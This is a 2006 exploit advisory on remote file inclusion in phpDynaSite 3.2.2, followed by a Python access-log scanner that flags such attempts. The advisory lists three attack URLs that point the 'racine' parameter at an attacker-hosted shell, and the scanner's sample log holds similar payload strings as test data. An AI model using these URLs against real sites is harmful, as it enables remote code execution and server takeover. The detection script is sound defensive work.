From:Dr.Pantagon <rezayavari2006_(at)_yahoo.com>
Date:05.11.2006
Subject:phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

**********************************************************************************************************
                                                   WwW.Deltahacking.NeT
**********************************************************************************************************

* dynasite3.2.2

* Class = Remote File Inclusion ;

* Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code

    include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


   http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
   http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
   http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  Dr.Torojan

**************************************************************************************************************

# milw0rm.com [2006-11-04]
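
A log check for the requests shown in the advisory above, as an added example that is not part of the original post: it flags access-log lines that request one of the three named scripts with a `racine` value that is a remote URL. The Apache-style log format, the sample lines, and the treatment of `https` and `ftp` alongside `http` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameter named in the advisory above.
AFFECTED_SCRIPTS = {"function_log.php", "function_balise_url.php", "connection.php"}
PARAM = "racine"
# Assumption: racine is meant to hold a local path prefix, so a value that
# starts with a remote URL scheme is never legitimate.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Assumed common/combined log format: "METHOD target PROTOCOL"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def is_rfi_attempt(log_line):
    """Return True if the line requests an affected script with a remote racine."""
    match = REQUEST_LINE.search(log_line)
    if not match:
        return False
    target = urlsplit(match.group(1))
    script = target.path.rsplit("/", 1)[-1]
    if script not in AFFECTED_SCRIPTS:
        return False
    # parse_qsl percent-decodes names and values, so encoded URLs are caught too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == PARAM and REMOTE_VALUE.match(value):
            return True
    return False


def scan(lines):
    """Return the log lines that look like inclusion attempts."""
    return [line for line in lines if is_rfi_attempt(line)]


# Constructed sample log lines (documentation addresses, example.test host).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Nov/2006:10:00:01 +0000] "GET /site/function_log.php?racine=http://example.test/x? HTTP/1.1" 200 512',
    '192.0.2.11 - - [05/Nov/2006:10:00:02 +0000] "GET /site/connection.php?racine=http%3A%2F%2Fexample.test%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [05/Nov/2006:10:00:03 +0000] "GET /site/index.php?page=home HTTP/1.1" 200 2048',
    '192.0.2.13 - - [05/Nov/2006:10:00:04 +0000] "GET /site/function_log.php?racine=./ HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("possible remote file inclusion attempt:", hit)
```

Only GET query strings are inspected; a value sent in a POST body does not appear in a standard access log and needs request-body logging to detect.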
